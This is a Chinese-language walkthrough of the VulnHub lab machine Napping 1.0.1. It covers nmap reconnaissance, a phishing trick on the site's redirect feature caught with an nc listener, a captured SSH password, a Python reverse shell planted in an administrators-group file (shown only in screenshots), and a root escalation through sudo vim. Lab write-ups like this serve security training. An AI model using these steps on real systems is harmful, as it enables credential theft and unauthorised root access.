vulnhub靶机Napping1.0.1教程

靶机下载地址:Napping: 1.0.1 ~ VulnHub

主机发现

arp-scan -l

vulnhub靶机Napping1.0.1教程_第1张图片

端口扫描

nmap --min-rate 10000 -p- 192.168.21.133

vulnhub靶机Napping1.0.1教程_第2张图片

扫描版本

nmap -sV -sT -O -p22,80 192.168.21.133

vulnhub靶机Napping1.0.1教程_第3张图片

漏洞扫描

nmap --script=vuln -p22,80 192.168.21.133

vulnhub靶机Napping1.0.1教程_第4张图片

主要以网站为突破口        

vulnhub靶机Napping1.0.1教程_第5张图片

注册账号先试试水

vulnhub靶机Napping1.0.1教程_第6张图片

注册登入之后发现有转跳点

vulnhub靶机Napping1.0.1教程_第7张图片

vulnhub靶机Napping1.0.1教程_第8张图片

这里既然能转跳,试试能不能钓鱼

写两个网页页面

vulnhub靶机Napping1.0.1教程_第9张图片

vulnhub靶机Napping1.0.1教程_第10张图片

需要启动python3的http服务

启动方法:

       进入www目录

       Python -m http.server

       结尾带上&字符则ctrl+c不会关闭服务

       结尾带上端口则指定端口

监听8000端口

nc -lvvp 8000

vulnhub靶机Napping1.0.1教程_第11张图片

vulnhub靶机Napping1.0.1教程_第12张图片

username=daniel&password=C@ughtm3napping123

成功拿到用户名和密码(%40=@)

那么这个因该是ssh的账号密码了

vulnhub靶机Napping1.0.1教程_第13张图片

由于sudo -l无法执行,就查看用户组

那就需要寻找daniel可以执行的administerators的文件

find / -group administrators 2>/dev/null

vulnhub靶机Napping1.0.1教程_第14张图片

试一下能不能直接写shell,用python调用运行

等着自动连接就可以

vulnhub靶机Napping1.0.1教程_第15张图片

vulnhub靶机Napping1.0.1教程_第16张图片

sudo -l

vulnhub靶机Napping1.0.1教程_第17张图片

看到nopasswd后面的路径,直接吧bash传过来

sudo /usr/bin/vim -c ':!/bin/sh'

提权完成

Flag

你可能感兴趣的:(vulnhub,linux,网络安全,安全,系统安全,web安全,网络攻击模型,安全威胁分析)